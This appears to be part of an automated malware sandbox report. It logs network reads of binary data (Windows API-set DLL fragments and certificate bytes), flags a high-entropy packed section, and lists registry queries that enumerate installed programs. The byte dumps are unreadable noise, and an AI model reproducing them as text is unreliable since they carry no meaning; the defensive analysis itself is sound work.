InternetReadFile July 22, 2021, 1:53 p.m.	buffer: ÷ 2OaÐÝp[AØ5¦]°¶4^\`Å±¢tq²ØìxÕzÓÄU£xÒöÌrç3gnªjÛ{`Ñ¾T¾0à¯ï$;ªËþà\ªÎCtê&3$ó`Àá[ý§A¨TÔåT®N,º¢w¯Ýô,¨¸pÂÀß¢/zÈë$cbAÈ+CEVw@b¿#¾M´jÎÌÔýö°×¹ZE ú '3µóZ÷ófJ¼EÅ¥7£I0c¼7ÌmrFfâíß£Cë9I÷îÍÐ9Õc Ä"å6~3AË¹iØïÙ&ß¥&_Ì¾¯õ²_åPjÔlU^ùë7¥°4y}Ù°½ uÿ¿ë§ô½¹I%h÷%ÓÈ \ñ«Kg6>t÷8eiht)#7Q[g+ Þ?øoÞîúTÈÐoL T³«8Ú½C:íú³X2/-ãÇ5}@üUÙôÍù¦=X¶ÍS-/}¦y,~n~ÎÎqçÀeQ^ÿQÕ¯×þ<§}²×±º'þw3á&Ý)õc^HÛa«åÐáÒOðO¥ìÐº¾Ó48ß?³OY#Cx¾Q/BBpÒ² K¥ÆÊo H¡00, H÷ 1000r10 UUS10U DigiCert Inc10Uwww.digicert.com110/U(DigiCert SHA2 Assured ID Timestamping CA BJà¾:ÿ`@!ÎðÝ0 `He i0 H÷ 1 H÷ 0 H÷ 1 210527192334Z0/ H÷ 1" ÐôãÖ£²1Y£{iÆà¼ª(p ÝûEeéï0 H÷ C%*QRíV`äÓAü"úXÃzA¦âC]Ö\|K>éÛ^ÊÑx²ÀP¹V;1t/çÄ.ôÅO°g ú±ß"æJÚI¥ÒQå·+"#¡·ûQl[øþ·\|¦çdù~x¾eö×íÛÀ&L?I!È¤Aª ûÉÅþþæ·ôÆ´ÎÀÿ W£ÆUþ©È¢¹á± ®ÞUÒ2ÞDÓ¼¥ß/>Tùòeó2UD/§SÈ)CùÕKcrñ2²DßÐÖ¶p,ÆñN.´¯è¿)J 4$FÃ'-"YO ù(:háMZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3AÁw ew ew eDev eDau eDv eDgv eRichw ePELIìOà! 0@ðL ð =T.text< `.rsrcð @@IìO8TTIìO dIìORSDSyN'Ò;rC¿ù¦Ðl{¤api-ms-win-core-file-l1-2-0.pdbT.rdataT.rdata$zzzdbgðL.edata `.rsrc$01` .rsrc$02IìO@(8lÆ`¤ñapi-ms-win-core-file-l1-2-0.dllCreateFile2kernel32.CreateFile2GetTempPathWkernel32.GetTempPathWGetVolumeNameForVolumeMountP request_handle: 0x00cc000c	1	1
InternetReadFile July 22, 2021, 1:53 p.m.	buffer: 9Z$WÈ rP«Ðtì g)]ÔÅµ<H¯ è¬çõ4½h43xÒ±}õ: ¯:ÛYïIg£6w _/ íkó°1f1õ0ñ00\|10 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103®ÖNÛõ®0 `He 20 H÷ 1 H÷ 0/ H÷ 1" XÏ§j¸¶ENQYÝánÝÉGÐ!Uøº³#0âH÷ 1Ò0Ï0Ì0±ÇÁ½0{¥d^gt6ú»ã¼hû00¤~0\|10 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103®ÖNÛõ®0öRó_ÚâÔ¶r#j¶3[+0 H÷ X¼´÷Yï;wnÂC&ûv¸±Ú6Hé¦×Z]l%<;<Ögëö¶$á2¬çÝj¼bµÌÚ¡ªvßÆ¸IË `Â\|ãZ<sêo¾È{lbÖÆ}¤õàS»Ä$=ç²£î)7j\|Xê[£×w4LøImàD³hÑq5úØäï¨}Ëk)@¨øá» BZ¡¶ìLÜØulí1÷6aaÝÿ8Í^Á¿r<2åä°g:ÌëÆs÷`£àóø¹ÊTAýÁÀò~µ¶%2ËµÎ@sßagÚé]?è´³Nu÷:3MZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3AÁw ew ew eDev eDau eDv eDgv eRichw ePEL%éàrà! 0`@ð ð =T.text} `.rsrcð @@%éàr8TT%éàr d%éàrRSDSäòVf0°<âÛj\api-ms-win-core-file-l2-1-0.pdbT.rdataT.rdata$zzzdbgð.edata `.rsrc$01` .rsrc$02%éàrDp°Ï÷#P¼ç;g¦Ãä<m°Ñ%Z api-ms-win-core-file-l2-1-0.dllCopyFile2kernel32.CopyFile2CopyFileExWkernel32.CopyFileExWCreateDirectoryExWkernel32.CreateDirectoryExWCreateHardLinkWkernel32.CreateHardLinkWCreateSymbolicLinkWkernel32.CreateSymbolicLinkWGetFileInformationByHandleExkernel32.GetFileInformationByHandleExMoveFile request_handle: 0x00cc000c	1	1
InternetReadFile July 22, 2021, 1:53 p.m.	buffer: 20 H÷ 1 H÷ 0/ H÷ 1" ïs8.b©ÉídhÚ"Ýje1ä{Ù/^áÚÔpÕÈO0âH÷ 1Ò0Ï0Ì0±9p%ÈyÝ_]é³÷·00¤~0\|10 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103¬!¼zÒrô¬0tìüe¨i©¸¶Tÿÿ½øYÂ0 H÷ Òj´2ÕÝU+\èqze¢>¡jÞIVBwé>&4Þed(&3àÖ8WEäx/iRÊQvï¨Ãõ¢i¦¶SâÅ¬OÉì®¿èE2ñÖo Çý.ÍÜíKã¬ýÛhów(êqßxzD=áÎò]É¡®xîÓN¤¢$G:W¬ò`¸ùí¥m¾#è©[§£ÝVM\|Êäî>Ó_r/( ¿þàý:p8 ÆEa¸N# ±OÂÿ¬¾ÛáÐþÍô.ßè5Ýu¸Ñáé§!(Î±û<Ï\,³+uZ§¡_MZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3AÁw ew ew eDev eDau eDv eDgv eRichw ePELc» @à! 0<H@Ç ð=T.textÇ `.rsrcð @@c» @@TTc» @ dc» @RSDS¾«ô@Ó¤ª&¤ê$&api-ms-win-core-localization-l1-2-0.pdbT.rdataT¬.rdata$zzzdbgÇ.edata `.rsrc$01` .rsrc$02c» @v;;(³á <fµÜû5]²Ùý!Iq¾àNÁø/jÇø/^Àá/\¶â8`¨Ïû'P¿ö1[Ñú)X}¦Íô(Kx£Êñ9b®×ò9l£èV´ãQtµÔ÷Ix¡Ôù&Sv¾éAh¯ØNq !"#$%&'()*+,-./0123456789:api-ms-win-core-localization-l1-2-0.dllConvertDefaultLoca request_handle: 0x00cc000c	1	1
InternetReadFile July 22, 2021, 1:53 p.m.	buffer: ÉÊ$èy1ôý¦ÅL³ÎÇ°÷ìêj%2¾Üa¦2½ÁÈpõÜ£¿sÀËvü8vG,IÉ!´EeéB$-g5/ÉF+¯.ÂEñ8J8§~+1õ0ñ00\|10 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103¥Hr'ùp¾c¥0 `He 20 H÷ 1 H÷ 0/ H÷ 1" O«Ê0¼é´kü%¥\|tªtüîðö¼ R¿)0âH÷ 1Ò0Ï0Ì0±Â5Ýû²&+1eP/Sio00¤~0\|10 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103¥Hr'ùp¾c¥0+âä<~®å£M"0 H÷ :ï¢_´¤JÒyFXÃøYî8[ï3/(~KóØ5²ÈXo'[wM¨¼ P+®ÅÒ2dS6T8Em!VÊäæg²m=TZ0nÅÍZR½L)éç,öqÑ:ÔtâÖÄ4ÎnùÄm£äiÆWZ ÄÁ\¸Ñ<Õ=¥¨Ø=hG3:JzÚºÚn´$³Åã®@¢ÁrÂTVI2 ¾þ>%¡K4ÌÛÞ¿En~ +æÏc6âpñAdßå!µsM±cñ&sÓ=}ýi¦\|ëå_içp«)ÆûÃF14dMZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3AÁw ew ew eDev eDau eDv eDgv eRichw ePELZ¬Îsà! 0¥¿@Ú ð=T.textÚ `.rsrcð @@Z¬ÎsBTTZ¬Îs dZ¬ÎsRSDS×¬ójñ°¶ýO×¢m÷hapi-ms-win-core-processthreads-l1-1-1.pdbT.rdataT¬.rdata$zzzdbgÚ.edata `.rsrc$01` .rsrc$02Z¬Îs´(`ô-lè"W½ïN·ÞPÒFq®Õ3r api-ms-win-core-processthreads-l1-1-1.dllFlushInstructionCachekernel32.FlushInstructionCacheGetCurrentProcessorNumberkernel32.GetCurrentProcessorNumberGetCurrentProcessorNumberExkernel32.GetCurrentProcessorNumberExGetCurrentThreadStackLi request_handle: 0x00cc000c	1	1
InternetReadFile July 22, 2021, 1:53 p.m.	buffer: êÿ0ï0 Þð]06 +Y 1(0&0 +Y 0ã`¡ 00 H÷ F´zxg¾uÈÜÞX¾©:¬j-KS7è7LCªÍ²ÆZmíºêÄx`ÿB'ËP 6Þ@lP¸ªèeÒ'Õü?}ç\æ±}Gè®¿Èñ$÷ gâ±N6×©w Ï1WÒlîõäZ¸`Ü¥·]ñÁ¸]Û¬=SÔç»~_ÊyÈìø?<Ög ! &=°+!ÅùB±\|.öÏðoþåV(Ö¼OH¦ÐU[äÿA u@®è¶î\3·eåì\|ÅYM 4 8(o[ 3ÚjO#ø1 w#fK¤Ê )¿?Û1õ0ñ00\|10 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103·ø"}"þú·0 `He 20 H÷ 1 H÷ 0/ H÷ 1" ®«Æ?¶Ìæ¯{ÃÐ+YR£«1?G¿µJôS¢0âH÷ 1Ò0Ï0Ì0±ÕãÐþY6äÂdYIé×"ÇEê 00¤~0\|10 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103·ø"}"þú·0åc¼D²H¹$GV¨µ¥0 H÷ §pæ/¥¥ë`=cuaÅè"h»m+fBÇ6Y°³PrÙ °~´mZ¥MªïD'm/&RÂ°Èòµ©ö6QÀë¬Û%ÿ~~w®çÑÚ û(%¨"y¦4ßs´ÉÆ¶ý¹7«H t7Y©¬¤ LµPñZ®ô=« Möª^°3SÎb¨ÐÌ«ÇlýãüÌç ì³Ê.M5R©ë)}?øçØoá5}AÕDYç<´ßzt<YrÉ-Ð¨TÂDÅÜ¶73)sQdB(áG:1osøå_Úö7«MZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3AÁw ew ew eDev eDau eDv eDgv eRichw ePEL«>»²à! 0RÏ@v ð=T.textv `.rsrcð @@«>»²9TT«>»² d«>»²RSDS©ßÝ*YJeíå§ðX÷Qapi-ms-win-core-synch-l1-2-0.pdbT.rdataT¬.rdata$zzzdbgv.edata `.rsrc$01` .rsrc$02«>»²Ò(l°RÁïWÛþ&bÃö$Wó6w°Û;\|Çø H request_handle: 0x00cc000c	1	1
InternetReadFile July 22, 2021, 1:53 p.m.	buffer: 0U Washington10URedmond10U Microsoft Corporation10 UAOC1'0%UnCipher NTS ESN:2665-4C3F-C5DE1+0)U"Microsoft Time Source Master Clock0 H÷ Þ\0"20180419214500Z20180420214500Z0t0: +Y 1,00 Þ\0ç0;0 ÞÝÜ06 +Y 1(0&0 +Y 0ã`¡ 0¡ 0 H÷ #&Àµøðnôþ¦o"Ï''¶ÂöôO¯¯,}ÂN >G@ÔoÐg&ÙT}'"yIÖJÀÛ)ê:x5 û9Íí¨ÚmÂµ_5 ^Ëõ1$¸HÙH¦é@ µ§,<×ÚÛZ`ÂIsÍ¶{`lê?ÚÚpjÎnîø¼àÈú»vÔÃÛèhÊgk-UBÑH}vô"¹á>¶ÝÚØ¸Ë%RÜúW¡#eeÕ0 í ëÁEü²ú©CøKÖCÂ@8 XÄå_-~n¥ÜË$ñ³Ó¾`âëÂ³y^k8h1õ0ñ00\|10 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103§d]Å(=D§0 `He 20 H÷ 1 H÷ 0/ H÷ 1" ÈÁªæq Þ:(@ÛbwSìfÕ¿sªY0âH÷ 1Ò0Ï0Ì0±ä.26mt2Á!´ ëwÙ00¤~0\|10 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103§d]Å(=D§0°¼lz<ðKsâæËhCï·70 *H÷ kÑ{_,Ã7A÷$ÌhÊýU/Ôdn-ì{«&<;ü5K~¡þÅøf åÑS"Aô¥,ªº ÿ\|¿kQõ£Xv+AM©Æw;U¯¹=U<m åæce«R³¬.5ò\xbÎSy©¨ù_mÉ.³:ül«ZP»91¥ÜìU¶ûc·Lßâ"gªùÍd¿Äa7®í 2xöNÉËuCIDðØ°rÍù¼TÞ//Ñ\\| (ç(ÌyyÎ!ëYÔÙ7'ÂDÿMI=ºî¢Hñz¡°F¿Á-çeÚ^kMZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3AÁw ew ew eDev eDau eDv eDgv eRichw ePEL} üà! 0a9@E ð=T.textE `.rsrcð @@} ü<TT} ü d} üRSDSfbf¹{£Á¬AïÅ~}api-ms-win-core-timezone-l1-1-0.pdb request_handle: 0x00cc000c	1	1
InternetReadFile July 22, 2021, 1:53 p.m.	buffer: t0\0â¡¸¤µ0²10 UUS10U Washington10URedmond10U Microsoft Corporation10 UAOC1'0%UnCipher DSE ESN:7AB5-2DF2-DA3F1%0#UMicrosoft Time-Stamp Service¢% 0 +Éì»H-5Ù¾¶÷&©1n2 Á0¾¤»0¸10 UUS10U Washington10URedmond10U Microsoft Corporation10 UAOC1'0%UnCipher NTS ESN:2665-4C3F-C5DE1+0)U"Microsoft Time Source Master Clock0 H÷ ÞÈ0"20180419214648Z20180420214648Z0t0: +Y 1,00 ÞÈ0³00 ÞÞH06 +Y 1(0&0 +Y 0ã`¡ 0¡ 0 H÷ ÑyÄ£§"?ïk¤££o x³³[p ³&PA{[:$!·ÃÊérªÅò\Òxò¶°+ò¢JYÀý?ÑumDÅÃeQAe¾MPþ~u«{_gùkÀ¦ P{ªvz¥Të§åÃ(±ÚLSAì¬E¶y~Ø SJ}Í©´ãMç;õXt¦EVØSÑÕù4¯X¥F¼wÎXä .÷&Yµ`_ \|Á¼çØwCC)ôöIZ]×²£ÌíZ÷·Ëî¯µ`Øè¡ßUÚ7\'§oKq¯ÝWóÎu ßÝ×vôHd /Ê![³R±ne=ääØÀ1õ0ñ00\|10 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103«^@îFß,l«0 `He 20 H÷ 1 H÷ 0/ H÷ 1" ¯üt-6XßØól.Í\° nÇxP~F¦úÕ 0âH÷ 1Ò0Ï0Ì0±Éì»H-5Ù¾¶÷&©1n200¤~0\|10 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103«^@îFß,l«0ìØU¹ÇË~>I¼@õ«Ê¾ß0 H÷ bÁkBÜ_<qÂsO-ß<]s,¯·éóïÚâ½z{m7ß Q'\|Ý¿¬úÉÌy`ê±MlZ*Õë_4$ÅòÃ/¯"o^ë´Ég»·«èÓ¦á]TÈÑÈÝuë±&µ âÚO}';(JH,÷ÏÑç©Fz oÐùks[q¥~_h;TÙÁÎ¸p,9Ìùê:¸ÃPõÔé¯,WÔíÏÝ5à;0J°Ûåþ2+uûy/·OM@ÊãXNñö ´ òöø ÀcTýõ!æE°¤'zØxYÌðõÏ®ìÂMZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3AÁw ew ew eDev eDau eDv eDgv eRichw ePELxèÆöà! 0À¬@ð ð=T request_handle: 0x00cc000c	1	1
InternetReadFile July 22, 2021, 1:53 p.m.	buffer: oft Corporation1&0$UMicrosoft Time-Stamp PCA 20103«^@îFß,l«0ìØU¹ÇË~>I¼@õ«Ê¾ß0 *H÷ .UéêC½0Ú^IØBn>·yÅ,5mXpÖ©ýùÞÕ¯3eÄð?ù×ôâf_~É«wÉ2ßÄZA§ <1J4þ%VÓ</]Üø9ÒºÓÇgÕ]çqÀ-éJ¬Ä9×"Ñ1©¨TVO5i¹¨¨òé7Ñ«HþÂø3¯"®'àÕnÅòk×Æ+@¾Xøe°tÕß2·"d£?(»µcãüf1}\Ó°D¬\'Ì+YDmì½Gàðãõu´ì\¥0<CM¬Ñ¸ã'ûT~S¢ÿï~lõ°=ksAMZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3AÁw ew ew eDev eDau eDv eDgv eRichw ePELQà! 0N@e ð=T.textu `.rsrcð @@vQ9ddQ d QRSDSÏ¦5m(åá°nfúapi-ms-win-crt-locale-l1-1-0.pdbd.rdatad¬.rdata$zzzdbge.edata `.rsrc$01` .rsrc$02Q8Ø5hÑE§Óÿ$Nt´Öÿ$Db!R¾í s¿ð:k«Æï9X api-ms-win-crt-locale-l1-1-0.dll___lc_codepage_funcucrtbase.___lc_codepage_func___lc_collate_cp_funcucrtbase.___lc_collate_cp_func___lc_locale_name_funcucrtbase.___lc_locale_name_func___mb_cur_max_funcucrtbase.___mb_cur_max_func___mb_cur_max_l_funcucrtbase.___mb_cur_max_l_func__initialize_lconv_for_unsigned_charucrtbase.__initialize_lconv_for_unsigned_char__pctype_funcucrtbase.__pctype_func__pwctype_funcucrtbase.__pwctype_func_configthreadlocaleucrtbase._configthreadlocale_create_localeucrtbase._create_locale_free_localeucrtbase._free_locale_get_current_localeucrtbase._get_current_locale_getmbcpucrtbase._getmbcp_l request_handle: 0x00cc000c	1	1
InternetReadFile July 22, 2021, 1:53 p.m.	buffer: ime-Stamp PCA 20103§d]Å(=D§0 `He 20 H÷ 1 H÷ 0/ H÷ 1" Ghq%ZÉî¶ñâì=sÐZWùòÐ1]ÉÌØ0âH÷ 1Ò0Ï0Ì0±ä.26mt2Á!´ ëwÙ00¤~0\|10 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103§d]Å(=D§0°¼lz<ðKsâæËhCï·70 *H÷ I¯Iíc`ÞHóJc¯mNéæOáö_óÒâëEõÖ÷ÖôÔòÎ ÈBQcCki%º-h®kë0¨\|¾@²Iôù½&@uÅ+ö äÍ$ªUÌï7÷¿p4óØd¸+ð¸,¥óà Lø¯{¼ %cÝÎ2°:k¬Òi>ÃtÄÌ\|Äõ¶¦ û¼c ûòYsO)©^øêzÇÈã±.'ÝähK¶Pìª 5ao7(å vò«}ÛUDú0,¢ZáE\ ªI±&cô¼dþå«È5:³¢¨ð 'WMZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3AÁw ew ew eDev eDau eDv eDgv eRichw ePEL2àÀÊà!Úð K@×ððà=T.textØÚ `.rsrcððÜ@@v2àÀÊ:dd2àÀÊ d 2àÀÊRSDSTrXT¯{ïÝbÝÛéñapi-ms-win-crt-private-l1-1-0.pdbd.rdatad¬.rdata$zzzdbg×.edatað`.rsrc$01`ð.rsrc$022àÀÊ¦>8d#5Ù>?-?U??Ê?î?@L@@·@ì@!ARAA°AßABBBBÅBC>CvC©CÑCõCD>DwDÀDE[EEÇEöE'F]FF¿FýF8GkGG²GÜGH7HYHH¶HíHIEIsI IÇIêI J(JGJgJJ¤JÂJàJþJK<KYKwKK´KÒKòKL:L^LL©LÒLøL%M^MMÓMN<N}NÀNO?OOÇO P;P_PPºPìPQPQQ´QçQRHRxR¨RØR S=SpS SÐST0T`TT»TàTU-UUU~U¥UÎUùU!VHVqVVÅVñV$W`W¤WåW!XbX¥XåX$YgY¬YîY request_handle: 0x00cc000c	1	1
InternetReadFile July 22, 2021, 1:53 p.m.	buffer: 0 H÷ `îÎá}yÆxÎL¤jgGrÊäÁ\|ç-ãg¼ètz?ÊéF$?¡Îð~OÒô}ôv86¥ÙoÊÅSï, Ñ yÅÒîm<?Fé¹RÞß\â¤MQjÂéMFr&ùÿwÝè=TüÂ _½Utéd¬°äÊ\; UX°ÃË§¼Y,MBí[³0.§N®©y1ìR\|¯ÁÎ#ÛÌjÃÄô,ud, Ø÷e¨\~Xîyó!ÛÍ,¿µrþ_vv2®R<m9.ÌN$I-/©fÖüh&¡t0\0â¡¸¤µ0²10 UUS10U Washington10URedmond10U Microsoft Corporation10 UAOC1'0%UnCipher DSE ESN:57C8-2D15-1C8B1%0#UMicrosoft Time-Stamp Service¢% 0 +ÅkÌ§ÁG ìÓDüÎmÐê Á0¾¤»0¸10 UUS10U Washington10URedmond10U Microsoft Corporation10 UAOC1'0%UnCipher NTS ESN:2665-4C3F-C5DE1+0)U"Microsoft Time Source Master Clock0 H÷ Þñ0"20180419215601Z20180420215601Z0t0: +Y 1,00 Þñ0'0×0 Þàq06 +Y 1(0&0 +Y 0ã`¡ 00 H÷ qS;¾gJÚ& Z©ÄÔ¸ÝíÜ>{~M+Ó·ÓÍö_Ð@'ÐÔí]µ!WVzPÝÛ:'rå¯Õ±¯s }Ñä'p?#ê9ÅñÍ¼³Ä=«¶=mE¶Ñk:Ü¼ºÒà e / oÇëV°1{oÒ½nÂ7ÚÚæ^Z¸JÜÀ&&Ã»®¹ïhò92a^ñ¨û^BA1ÜRí 5Aâ ô64·sãÝªnòDlþIl¼EØµ Ûç¬J´kÎÙàãQ¢ë÷2âBQKðøÿUEøû¡n=MD¥<KNå¿1õ0ñ00\|10 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103ª·©ÿêWÃ ª0 `He 20 H÷ 1 H÷ 0/ H÷ 1" ¹1®¹´GTóoþs1)_-súñ\éÖ(¾õ;ÿëY0âH÷ 1Ò0Ï0Ì0±ÅkÌ§ÁG ìÓDüÎmÐê00¤~0\|10 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103ª·©ÿêWÃ ª0ßW)[ËK¸D, ØBÂã¤¤0 H÷ ´íö[Y_ë)PSÜgFA¤ÒÏk2 .1C®o!¦I"b©è¿N¯ òZvMÃåçÓÏ&öÏfÆE¸°ÖL÷ßî¹c»M¨ S2¾ÝåT*/?;ÐFþÊ»23qøc+BqÁz²HÑ¢Í ~ÍGg%£Ömºåm\|&Ä±²fOÞpiñr)¹²d'íPCÕ~ûã6NÑ«hø'ï:~xàX ½s`èqÚh¡n^pÊ¤Î²ÔýU³{{È'Ó¯3bBÞzÌ1Ìñ¿o¶ãÈMu´ÂOMZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. request_handle: 0x00cc000c	1	1

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x0062fc00', u'virtual_address': u'0x00b7e000', u'entropy': 7.9636295746903984, u'name': u'.vmp1', u'virtual_size': u'0x0062fa10'}

entropy

7.96362957469

description

A section with a high entropy has been found

entropy

0.945945945946

description

Overall entropy of this PE file is high

Queries for potentially installed applications (50 out of 53 events)

Time & API	Arguments	Status
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000324 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: 7-Zip base_handle: 0x00000324 key_handle: 0x0000031c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: AddressBook base_handle: 0x00000324 key_handle: 0x00000320 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: Adobe AIR base_handle: 0x00000324 key_handle: 0x00000328 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: Connection Manager base_handle: 0x00000324 key_handle: 0x0000032c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: DirectDrawEx base_handle: 0x00000324 key_handle: 0x00000330 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: EditPlus base_handle: 0x00000324 key_handle: 0x00000334 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: ePageSafer base_handle: 0x00000324 key_handle: 0x00000338 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ePageSafer	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: Fontcore base_handle: 0x00000324 key_handle: 0x0000033c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: Google Chrome base_handle: 0x00000324 key_handle: 0x00000340 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: Haansoft HWord 80 Korean base_handle: 0x00000324 key_handle: 0x00000344 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: IE40 base_handle: 0x00000324 key_handle: 0x00000348 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: IE4Data base_handle: 0x00000324 key_handle: 0x0000034c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: IE5BAKEX base_handle: 0x00000324 key_handle: 0x00000350 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: IEData base_handle: 0x00000324 key_handle: 0x00000354 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: MobileOptionPack base_handle: 0x00000324 key_handle: 0x00000358 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: Mozilla Thunderbird 78.4.0 (x86 ko) base_handle: 0x00000324 key_handle: 0x0000035c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: Office14.PROPLUS base_handle: 0x00000324 key_handle: 0x00000360 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office14.PROPLUS	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: SchedulingAgent base_handle: 0x00000324 key_handle: 0x00000364 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: TouchEn nxKey base_handle: 0x00000324 key_handle: 0x00000368 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\TouchEn nxKey	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: UnINISafeWeb base_handle: 0x00000324 key_handle: 0x0000036c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\UnINISafeWeb	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: UnINISafeWeb6 base_handle: 0x00000324 key_handle: 0x00000370 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\UnINISafeWeb6	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: WIC base_handle: 0x00000324 key_handle: 0x00000374 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
